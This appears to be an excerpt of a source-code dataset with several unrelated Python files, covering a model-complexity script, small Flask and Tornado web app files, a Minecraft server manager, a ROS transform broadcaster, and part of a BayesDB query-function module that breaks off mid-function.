"line_number": 60, "usage_type": "name"}, {"api_name": "time.time", "line_number": 70, "usage_type": "call"}, {"api_name": "time.time", "line_number": 72, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "name"}, {"api_name": "tools.pretty_time", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "26613513", "text": "import os\n\nimport torch\n\nimport instanceseg.factory.data\nimport instanceseg.factory.models\nimport instanceseg.factory.optimizer\nimport instanceseg.factory.trainers\nfrom instanceseg.datasets import synthetic\nfrom instanceseg.utils import script_setup\nfrom scripts.configurations import synthetic_cfg\nfrom instanceseg.analysis import computational_complexity\n\n\ndef setup():\n cfg_override_kwargs = {}\n\n script_setup.set_random_seeds()\n gpu = 0\n os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu) if isinstance(gpu, int) else ','.join(str(gpu))\n cuda = torch.cuda.is_available()\n\n cfg = synthetic_cfg.get_default_train_config()\n for k, v in cfg_override_kwargs.items():\n cfg[k] = v\n problem_config = instanceseg.factory.models.get_problem_config(\n synthetic.ALL_BLOB_CLASS_NAMES, n_instances_per_class=cfg['n_instances_per_class'])\n model, start_epoch, start_iteration = instanceseg.factory.models.get_model(\n cfg, problem_config, checkpoint_file=None, 
semantic_init=None, cuda=cuda)\n\n print('Getting datasets')\n dataloaders = instanceseg.factory.data.get_dataloaders(cfg, 'synthetic', cuda, sampler_cfg=None)\n\n optim = instanceseg.factory.optimizer.get_optimizer(cfg, model)\n trainer = \\\n instanceseg.factory.trainers.get_trainer(cfg, cuda, model, dataloaders, problem_config, out_dir='/tmp/',\n optim=optim)\n return trainer\n\n\ndef main():\n trainer = setup()\n trainer.train()\n val_loss, metrics, _ = trainer.validate_split(\n should_export_visualizations=False, split='train')\n print('Training set mean IU: {}'.format(metrics[2]))\n\n trainer.model = computational_complexity.add_flops_counting_methods(trainer.model)\n\n trainer.model.start_flops_count()\n\n loader = iter(trainer.train_loader)\n\n data = next(loader)\n\n batch = data[0].cuda()\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "scripts/analysis/compute_complexity.py", "file_name": "compute_complexity.py", "file_ext": "py", "file_size_in_byte": 1929, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "instanceseg.utils.script_setup.set_random_seeds", "line_number": 18, "usage_type": "call"}, {"api_name": "instanceseg.utils.script_setup", "line_number": 18, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 21, "usage_type": "attribute"}, {"api_name": "scripts.configurations.synthetic_cfg.get_default_train_config", "line_number": 23, "usage_type": "call"}, {"api_name": "scripts.configurations.synthetic_cfg", "line_number": 23, "usage_type": "name"}, {"api_name": "instanceseg.factory.data.factory.models.get_problem_config", "line_number": 26, "usage_type": "call"}, {"api_name": "instanceseg.factory.data.factory", "line_number": 26, "usage_type": "attribute"}, {"api_name": "instanceseg.factory.data", "line_number": 26, "usage_type": "name"}, {"api_name": "instanceseg.datasets.synthetic.ALL_BLOB_CLASS_NAMES", "line_number": 27, "usage_type": "attribute"}, {"api_name": "instanceseg.datasets.synthetic", "line_number": 27, "usage_type": "name"}, {"api_name": "instanceseg.factory.data.factory.models.get_model", "line_number": 28, "usage_type": "call"}, {"api_name": "instanceseg.factory.data.factory", "line_number": 28, "usage_type": "attribute"}, {"api_name": "instanceseg.factory.data", "line_number": 28, "usage_type": "name"}, {"api_name": "instanceseg.factory.data.factory.data.get_dataloaders", "line_number": 32, "usage_type": "call"}, {"api_name": "instanceseg.factory.data.factory", "line_number": 32, "usage_type": "attribute"}, {"api_name": "instanceseg.factory.data", "line_number": 32, "usage_type": "name"}, {"api_name": "instanceseg.factory.data.factory.optimizer.get_optimizer", "line_number": 34, "usage_type": "call"}, {"api_name": "instanceseg.factory.data.factory", "line_number": 34, "usage_type": "attribute"}, {"api_name": "instanceseg.factory.data", "line_number": 34, "usage_type": "name"}, {"api_name": "instanceseg.factory.data.factory.trainers.get_trainer", "line_number": 36, "usage_type": "call"}, {"api_name": "instanceseg.factory.data.factory", "line_number": 36, "usage_type": "attribute"}, {"api_name": "instanceseg.factory.data", "line_number": 36, "usage_type": "name"}, {"api_name": "instanceseg.analysis.computational_complexity.add_flops_counting_methods", "line_number": 48, "usage_type": "call"}, 
{"api_name": "instanceseg.analysis.computational_complexity", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "329500183", "text": "from flask import Blueprint, render_template, request, session, redirect, url_for, make_response\nimport random\n\n# 1.蓝图初始化\nblue = Blueprint('app', __name__)\n\n\n@blue.route('/')\ndef hello_world():\n return 'Hello World!'\n\n\n@blue.route('/login/', methods=['POST', 'GET'])\ndef login():\n if request.method == 'GET':\n # 获取存在redis数据库里的session里的值,返回页面\n username = session.get('username')\n return render_template('login.html', username=username)\n if request.method == 'POST':\n # 获取网页里的值,存在redis的session里。\n username = request.form.get('username')\n session['username'] = username\n return redirect(url_for('app.login'))\n\n\n@blue.route('/getresponse/')\ndef get_response():\n # 存储cookie\n response = make_response('
你是大帅逼')\n ticket = ''\n s = 'abcdefghijklmnopqrstuvwxyz0123456789'\n for i in range(20):\n ticket += random.choice(s)\n response.set_cookie('ticket', ticket, max_age='', expires='')\n return response\n\n\n@blue.route(\"/deletecookie/\")\ndef del_cookie():\n # 删除cookie\n response = make_response('你是大帅逼
    ')\n response.delete_cookie('ticket')\n return response", "sub_path": "day2/App/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1251, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Blueprint", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 29, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "189851833", "text": "#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\nimport os\n\nimport tornado.web\n\nfrom handlers.index import fe_url\nfrom handlers.admin_index import admin_url\n\nsettings = dict(\n ##设置cookie密钥,默认为字符串\"secure cookies\"\n cookie_secret= \"lN2ImsFwS0yZlOM+d68dJZ5Ko7mrqEPEpInixMSWG84=\",\n ##设置登陆路径,未登陆用户在操作时跳转会用到这个参数,默认为@tornado.web.authenticated\n #login_url= \"/login\",\n ##设置防跨站请求攻击,默认为False,即不可防御。\n #xsrf_cookies= True,\n\n #设置templates路径\n template_path = os.path.join(os.path.dirname(__file__), \"templates\"),\n\n ##设置静态文件解析路径\n static_path = os.path.join(os.path.dirname(__file__), \"static\"),\n\n #设置调试模式,默认为False,即不是调试模式。\n debug = True,\n\n ##设置是否自动编码:在2.0以上需要设置此项来兼容您之前的APP,不设置默认为自动编码。\n #autoescape = None,\n\n ##设置template_loader,可以从独立的路径中导入template:其中utils为自己定义的模块,ZipLoader是tornado.template.BaseLoader的子类。\n #template_loader=utils.ZipLoader,\n\n ##设置gzip压缩:\n #gzip=True\n\n #设置静态路径头部,默认是\"/static/\"\n #static_url_prefix = \"/templates/\"\n\n\n ##设置静态文件处理类.默认是tornado.web.StaticFileHandler\n #static_handler_class = MyStaticFileHandler,\n\n ##设置静态文件的参数,默认为空字典。\n #static_handler_args = {{ \"key1\":\"value1\", \"key2\":\"value2\" }\n\n ##设置日志处理函数,日志处理函数your_fun,按照自己的意图记录日志。\n #log_function = your_fun,\n )\n\nroutes = fe_url + admin_url\n\napplication = tornado.web.Application(\n handlers = routes,\n **settings\n )", "sub_path": "vmall/application.py", "file_name": "application.py", "file_ext": "py", "file_size_in_byte": 1811, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": 
"os.path.dirname", "line_number": 23, "usage_type": "call"}, {"api_name": "handlers.index.fe_url", "line_number": 51, "usage_type": "name"}, {"api_name": "handlers.admin_index.admin_url", "line_number": 51, "usage_type": "name"}, {"api_name": "tornado.web.web.Application", "line_number": 53, "usage_type": "call"}, {"api_name": "tornado.web.web", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 53, "usage_type": "name"}]} +{"seq_id": "187867510", "text": "\"\"\"\nMinecraft server instance representation\n\"\"\"\n\nimport asyncio\nimport fileinput\nimport glob\nimport hashlib\nimport json\nimport logging\nimport os\nimport os.path\nimport re\nimport shlex\n\nimport requests\n\nfrom . import errors\n\nclass Server(object):\n \"\"\"\n A Minecraft server instance\n \"\"\"\n\n PROPERTIES_FILE = 'server.properties'\n PROPERTIES_REGEX = re.compile(r'^([a-zA-Z0-9\\-]+)=([^#]*)( *#.*)?$')\n PROPERTIES_BOOL_REGEX = re.compile(r'^(true|false)$', re.IGNORECASE)\n PROPERTIES_INT_REGEX = re.compile(r'^([0-9]+)$')\n SETTINGS_FILE = 'mymcadmin.settings'\n VERSION_URL = 'https://launchermeta.mojang.com/mc/game/version_manifest.json'\n\n def __init__(self, path):\n \"\"\"\n Create an instance of the Minecraft server at the given file path.\n This does not create a new Minecraft server, instead its used to model\n a server.\n \"\"\"\n\n self._path = path\n self._cache = {}\n self._properties_file = os.path.join(path, Server.PROPERTIES_FILE)\n self._properties = None\n self._settings_file = os.path.join(path, Server.SETTINGS_FILE)\n self._settings = None\n\n @property\n def path(self):\n \"\"\"\n Get the file path of the server\n \"\"\"\n\n return self._path\n\n @property\n def server_id(self):\n \"\"\"\n Get the server server ID\n \"\"\"\n\n return os.path.basename(self._path)\n\n @property\n def java(self):\n \"\"\"\n Get the Java binary to use\n \"\"\"\n\n if 'java' not in self._cache:\n self._cache['java'] = self.settings.get('java', 'java')\n\n return self._cache['java']\n\n @property\n def jar(self):\n \"\"\"\n Get the server Jar to run\n \"\"\"\n\n if 'jar' not in self._cache and 'jar' in self.settings:\n self._cache['jar'] = self.settings['jar']\n\n if 'jar' not in self._cache:\n jars = glob.glob(os.path.join(self._path, '*.jar'))\n\n if len(jars) == 0:\n raise errors.ServerError('No server jar could be found')\n elif len(jars) > 1:\n raise errors.ServerError('Unable to determine server jar')\n\n self._cache['jar'] = jars[0]\n\n return self._cache['jar']\n\n @property\n def command_args(self):\n \"\"\"\n Get the command line arguments for starting the server\n \"\"\"\n\n command_args = [self.java]\n command_args += [\n shlex.quote(arg)\n for arg in self.settings.get('jvm_args', [])\n ]\n command_args += ['-jar', shlex.quote(self.jar)]\n command_args += [\n shlex.quote(arg)\n for arg in self.settings.get('args', [])\n ]\n\n return command_args\n\n @property\n def properties(self):\n \"\"\"\n Get the Minecraft server properties defined in the server.properties\n file\n \"\"\"\n\n if not self._properties:\n try:\n with open(self._properties_file, 'r') as props_file:\n props = props_file.readlines()\n except FileNotFoundError:\n raise errors.ServerError(\n 'Server properties file could not be found. 
' +\n 'Try starting the server first to generate one.'\n )\n\n self._properties = {}\n for line in props:\n match = Server.PROPERTIES_REGEX.match(line.strip())\n if not match:\n continue\n\n name, value, _ = match.groups()\n self._properties[name] = Server._convert_property_value(value)\n\n return self._properties\n\n @property\n def settings(self):\n \"\"\"\n Get the MyMCAdmin settings for this server that are defined in the\n mymcadmin.settings file\n \"\"\"\n\n if not self._settings:\n try:\n with open(self._settings_file, 'r') as settings_file:\n self._settings = json.load(settings_file)\n except FileNotFoundError:\n raise errors.ServerSettingsError(\n 'Server settings file (mymcadmin.settings) could not be ' +\n 'found.'\n )\n\n return self._settings\n\n def start(self):\n \"\"\"\n Start the Minecraft server\n \"\"\"\n\n command_args = self.command_args\n logging.info('Starting server with: %s', command_args)\n\n return asyncio.create_subprocess_exec(\n *command_args,\n cwd = self.path,\n stdin = asyncio.subprocess.PIPE,\n stdout = asyncio.subprocess.PIPE,\n stderr = asyncio.subprocess.PIPE,\n )\n\n def save_settings(self):\n \"\"\"\n Save any changes to the server settings to disk\n \"\"\"\n\n logging.info('Saving settings for %s to disk', self.server_id)\n\n tmp_file = self._settings_file + '.tmp'\n with open(tmp_file, 'w') as file_handle:\n json.dump(\n self.settings,\n file_handle,\n indent = '\\t',\n )\n\n os.replace(tmp_file, self._settings_file)\n\n logging.info('Settings successfully saved')\n\n @classmethod\n def list_versions(\n cls,\n snapshots = True,\n releases = True,\n betas = True,\n alphas = True):\n \"\"\"\n List all available server versions\n \"\"\"\n\n def type_filter(version_filter, versions):\n \"\"\"\n Filter out versions of a specific type\n \"\"\"\n\n return [\n v for v in versions\n if v.get('type') != version_filter\n ]\n\n resp = requests.get(cls.VERSION_URL)\n\n if not resp.ok:\n raise errors.MyMCAdminError('Unable to retrieve version list')\n\n versions = resp.json()\n latest = versions['latest']\n all_versions = versions['versions']\n\n if not snapshots:\n del latest['snapshot']\n all_versions = type_filter('snapshot', all_versions)\n\n if not releases:\n del latest['release']\n all_versions = type_filter('release', all_versions)\n\n if not betas:\n all_versions = type_filter('old_beta', all_versions)\n\n if not alphas:\n all_versions = type_filter('old_alpha', all_versions)\n\n return {\n 'latest': latest,\n 'versions': all_versions,\n }\n\n @classmethod\n def get_version_info(cls, version = None):\n \"\"\"\n Get information about a specific Minecraft server version\n \"\"\"\n\n versions = cls.list_versions()\n if version is None:\n version = versions['latest']['release']\n\n versions = [\n v\n for v in versions['versions']\n if v['id'] == version\n ]\n\n if len(versions) == 0:\n raise errors.VersionDoesNotExistError(version)\n\n version = versions[0]\n version_url = version['url']\n\n resp = requests.get(version_url)\n if not resp.ok:\n raise errors.MyMCAdminError(\n 'Unable to retrieve version information for {}',\n version,\n )\n\n return resp.json()\n\n @classmethod\n def download_server_jar(cls, version_id = None, path = None):\n \"\"\"\n Download a server Jar based on its version ID\n \"\"\"\n\n if path is None:\n path = os.getcwd()\n\n version = cls.get_version_info(version_id)\n if version_id is None:\n version_id = version['id']\n\n jar_path = os.path.join(\n path,\n 'minecraft_server_{}.jar'.format(version_id),\n )\n\n downloads = 
version['downloads']\n\n if 'server' not in downloads:\n raise errors.MyMCAdminError('Version does not support multiplayer')\n\n dl_info = downloads['server']\n dl_url = dl_info['url']\n dl_sha1 = dl_info['sha1']\n\n jar_resp = requests.get(dl_url, stream = True)\n if not jar_resp.ok:\n raise errors.MyMCAdminError('Unable to download server jar')\n\n sha1 = hashlib.sha1()\n with open(jar_path, 'wb') as jar_file:\n for chunk in jar_resp.iter_content(chunk_size = 1024):\n # Ignore keep-alive chunks\n if not chunk:\n continue\n\n jar_file.write(chunk)\n sha1.update(chunk)\n\n jar_sha1 = sha1.hexdigest()\n if jar_sha1 != dl_sha1:\n raise errors.MyMCAdminError(\n 'Downloaded server jar\\'s sha1 did not match the expected value. ' +\n 'Was {}, should be {}.',\n jar_sha1,\n dl_sha1,\n )\n\n return jar_path\n\n @classmethod\n def agree_to_eula(cls, path = None):\n \"\"\"\n Accepts Mojang's EULA\n \"\"\"\n\n if path is None:\n path = 'eula.txt'\n else:\n path = os.path.join(path, 'eula.txt')\n\n with fileinput.FileInput(path, inplace = True, backup = '.bak') as file_handle:\n for line in file_handle:\n print(\n re.sub(\n r'FALSE',\n 'TRUE',\n line,\n flags = re.IGNORECASE,\n ),\n end = '',\n )\n\n @classmethod\n def generate_default_settings(cls, path = None, jar = None):\n \"\"\"\n Generates a default settings file for a server\n \"\"\"\n\n if path is None:\n path = 'mymcadmin.settings'\n else:\n path = os.path.join(path, 'mymcadmin.settings')\n\n default_settings = {\n 'java': 'java',\n 'jvm_args': [],\n 'args': ['nogui'],\n 'autostart': True,\n }\n\n if jar is not None:\n default_settings['jar'] = jar\n\n with open(path, 'w') as file_handle:\n json.dump(\n default_settings,\n file_handle,\n indent = '\\t',\n )\n\n @classmethod\n def _convert_property_value(cls, value):\n \"\"\"\n Convert a value from the properties value to its correct type. 
IE\n integers are converted to ints, true/false to boolean, etc.\n \"\"\"\n\n if value == '':\n return None\n elif cls.PROPERTIES_BOOL_REGEX.match(value):\n return value.lower() == 'true'\n elif cls.PROPERTIES_INT_REGEX.match(value):\n return int(value)\n else:\n return value\n\n", "sub_path": "mymcadmin/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 10743, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "re.compile", "line_number": 26, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 27, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "shlex.quote", "line_number": 102, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 105, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 107, "usage_type": "call"}, {"api_name": "json.load", "line_number": 151, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 166, "usage_type": "call"}, {"api_name": "asyncio.create_subprocess_exec", "line_number": 168, "usage_type": "call"}, {"api_name": "asyncio.subprocess", "line_number": 171, "usage_type": "attribute"}, {"api_name": "asyncio.subprocess", "line_number": 172, "usage_type": "attribute"}, {"api_name": "asyncio.subprocess", "line_number": 173, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 181, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 185, "usage_type": "call"}, {"api_name": "os.replace", "line_number": 191, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 193, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 216, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 266, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 288, "usage_type": "call"}, {"api_name": "os.path", "line_number": 288, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 302, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 306, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 336, "usage_type": "call"}, {"api_name": "os.path", "line_number": 336, "usage_type": "attribute"}, {"api_name": "fileinput.FileInput", "line_number": 338, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 341, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 345, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path", "line_number": 359, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 372, "usage_type": "call"}]} +{"seq_id": "117327148", "text": "#! 
/home/michael/.local/share/virtualenvs/DeepLearningProject-WE2UAgWf/bin/python\n\nimport rospy\nimport time\nimport tf\nfrom tf3D import GazeboModel\nimport sys\n\ndef handle_turtle_pose (pose_msg, robot_name):\n\tbr = tf.TransformBroadcaster()\n\tbr.sendTransform((pose_msg.position.x,pose_msg.position.y,pose_msg.position.z),\n\t\t(pose_msg.orientation.x,pose_msg.orientation.y,pose_msg.orientation.z,pose_msg.orientation.w),\n\t\trospy.Time.now(),\n\t\trobot_name,\n\t\t\"/world\")\n\ndef publisher_of_tf():\n\trospy.init_node('publisher_of_tf_node', anonymous=True)\n\trobot_name_list=[\"turtlebot3_waffle_pi_fol_\" + sys.argv[1],\"turtlebot3_waffle_pi_fol_\" + sys.argv[2]]\n\tgazebo_model_object = GazeboModel(robot_name_list)\n\n\tfor robot_name in robot_name_list:\n\t\tpose_now = gazebo_model_object.get_model_pose(robot_name)\n\n\ttime.sleep(1)\n\trospy.loginfo(\"Ready .. Starting to Publish TF data now ...\")\n\n\trate = rospy.Rate(5)\n\twhile not rospy.is_shutdown():\n\t\tfor robot_name in robot_name_list:\n\t\t\tpose_now = gazebo_model_object.get_model_pose(robot_name)\n\t\t\tif not pose_now:\n\t\t\t\tprint(\"The pose of \" + str(robot_name) + \" is not yet availble.\")\n\t\t\telse:\n\t\t\t\thandle_turtle_pose(pose_now, robot_name)\n\t\trate.sleep()\n\nif __name__=='__main__':\n\ttry:\n\t\tpublisher_of_tf()\n\texcept rospy.ROSInterruptException:\n\t\tpass\n", "sub_path": "scripts/multipleBroadcaster.py", "file_name": "multipleBroadcaster.py", "file_ext": "py", "file_size_in_byte": 1282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tf.TransformBroadcaster", "line_number": 10, "usage_type": "call"}, {"api_name": "rospy.Time.now", "line_number": 13, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rospy.init_node", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tf3D.GazeboModel", "line_number": 20, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "rospy.loginfo", "line_number": 26, "usage_type": "call"}, {"api_name": "rospy.Rate", "line_number": 28, "usage_type": "call"}, {"api_name": "rospy.is_shutdown", "line_number": 29, "usage_type": "call"}, {"api_name": "rospy.ROSInterruptException", "line_number": 41, "usage_type": "attribute"}]} +{"seq_id": "42304060", "text": "#\n# Copyright (c) 2010-2014, MIT Probabilistic Computing Project\n#\n# Lead Developers: Jay Baxter and Dan Lovell\n# Authors: Jay Baxter, Dan Lovell, Baxter Eaves, Vikash Mansinghka\n# Research Leads: Vikash Mansinghka, Patrick Shafto\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport re\nimport utils\nimport numpy\nimport os\nimport pylab\nimport matplotlib.cm\nimport inspect\nimport operator\nimport ast\nimport math\nfrom scipy.stats import pearsonr, chi2_contingency, f_oneway\n\nimport utils\nimport select_utils\nimport data_utils as 
du\n\n###\n# Three types of function signatures, for each purpose.\n#\n# SELECT/ORDER BY/WHERE:\n# f(args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine)\n#\n# ESTIMATE COLUMNS\n#\n#\n# First argument of each of these functions is the function-specific argument list,\n# which is parsed from parse_(), also in this file.\n#\n# TODO: data_values unused\n##\n\n###################################################################\n# NORMAL FUNCTIONS (have a separate output value for each row: can ORDER BY, SELECT, etc.)\n###################################################################\n\n\ndef _column(column_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n col_idx = column_args[0]\n confidence = column_args[1]\n if confidence is None or not numpy.isnan(T[row_id][col_idx]):\n return du.convert_code_to_value(M_c, col_idx, T[row_id][col_idx])\n else:\n ## Do impute.\n Y = [(row_id, cidx, T[row_id][cidx]) for cidx in M_c['name_to_idx'].values() \\\n if not numpy.isnan(T[row_id][cidx])]\n code = utils.infer(M_c, X_L_list, X_D_list, Y, row_id, col_idx, numsamples,\n confidence, engine)\n if code is not None:\n # Inferred successfully! Fill in the new value.\n value = du.convert_code_to_value(M_c, col_idx, code)\n return value\n else:\n return du.convert_code_to_value(M_c, col_idx, T[row_id][col_idx])\n\ndef _column_ignore(col_idx, row_id, data_values, M_c_full, T_full, engine):\n \"\"\"\n This function handles selecting data from ignore columns. It's split into a different\n function because it needs to be passed M_c_full and T_full instead of M_c and T, as in _column.\n Since selecting ignore columns is probably a rare event, we can avoid passing M_c_full and T_full\n to _column as \"just in case\" arguments.\n \"\"\"\n return du.convert_code_to_value(M_c_full, col_idx, T_full[row_id][col_idx]) \n\ndef _row_id(args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n return row_id\n\ndef _similarity(similarity_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n target_row_id, target_columns = similarity_args\n return engine.call_backend('similarity', dict(M_c=M_c, X_L_list=X_L_list, X_D_list=X_D_list, given_row_id=row_id, target_row_id=target_row_id, target_columns=target_columns))\n\ndef _row_typicality(row_typicality_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n return engine.call_backend('row_structural_typicality', dict(X_L_list=X_L_list, X_D_list=X_D_list, row_id=row_id))\n\ndef _predictive_probability(predictive_probability_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n c_idx = predictive_probability_args\n assert type(c_idx) == int \n Q = [(row_id, c_idx, T[row_id][c_idx])]\n Y = []\n p = math.exp(engine.call_backend('simple_predictive_probability_multistate', dict(M_c=M_c, X_L_list=X_L_list, X_D_list=X_D_list, Y=Y, Q=Q)))\n return p\n\n#####################################################################\n# AGGREGATE FUNCTIONS (have only one output value)\n#####################################################################\n \ndef _col_typicality(col_typicality_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n c_idx = col_typicality_args\n assert type(c_idx) == int\n return engine.call_backend('column_structural_typicality', dict(X_L_list=X_L_list, col_id=c_idx))\n\ndef _probability(probability_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n c_idx, value = probability_args\n assert 
type(c_idx) == int\n try:\n observed = du.convert_value_to_code(M_c, c_idx, value)\n except KeyError:\n # value doesn't exist\n return 0\n row_id = len(X_D_list[0][0]) + 1 ## row is set to 1 + max row, instead of this row.\n Q = [(row_id, c_idx, observed)]\n Y = []\n p = math.exp(engine.call_backend('simple_predictive_probability_multistate', dict(M_c=M_c, X_L_list=X_L_list, X_D_list=X_D_list, Y=Y, Q=Q)))\n return p\n \n\n#########################################################################\n## TWO COLUMN AGGREGATE FUNCTIONS (have only one output value, and take two columns as input)\n#########################################################################\n\ndef _dependence_probability(dependence_probability_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n \"\"\"\n TODO: THIS NEEDS TO BE A FUNCTION ON CROSSCAT ENGINE! MOVE IT THERE!\n \"\"\"\n col1, col2 = dependence_probability_args\n prob_dep = 0\n for X_L, X_D in zip(X_L_list, X_D_list):\n assignments = X_L['column_partition']['assignments']\n ## Columns dependent if in same view, and the view has greater than 1 category\n ## Future work can investigate whether more advanced probability of dependence measures\n ## that attempt to take into account the number of outliers do better.\n if (assignments[col1] == assignments[col2]):\n if len(numpy.unique(X_D[assignments[col1]])) > 1 or col1 == col2:\n prob_dep += 1\n prob_dep /= float(len(X_L_list))\n return prob_dep\n\ndef _old_dependence_probability(dependence_probability_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n col1, col2 = dependence_probability_args\n prob_dep = 0\n for X_L, X_D in zip(X_L_list, X_D_list):\n assignments = X_L['column_partition']['assignments']\n ## Columns dependent if in same view, and the view has greater than 1 category\n ## Future work can investigate whether more advanced probability of dependence measures\n ## that attempt to take into account the number of outliers do better.\n if (assignments[col1] == assignments[col2]):\n prob_dep += 1\n prob_dep /= float(len(X_L_list))\n return prob_dep\n\n \ndef _mutual_information(mutual_information_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n col1, col2 = mutual_information_args\n Q = [(col1, col2)]\n ## Returns list of lists.\n ## First list: same length as Q, so we just take first.\n ## Second list: MI, linfoot. we take MI.\n if numsamples is None:\n numsamples = 100\n # backend n_samples argument specifies samples per model\n n_samples = int(math.ceil(float(numsamples)/len(X_L_list)))\n results_by_model = engine.call_backend('mutual_information', dict(M_c=M_c, X_L_list=X_L_list, X_D_list=X_D_list, Q=Q, n_samples=n_samples))[0][0]\n \n ## Report the average mutual information over each model.\n mi = float(sum(results_by_model)) / len(results_by_model)\n return mi\n \ndef _correlation(correlation_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n col1, col2 = correlation_args\n\n # Create map of modeltype to column type. 
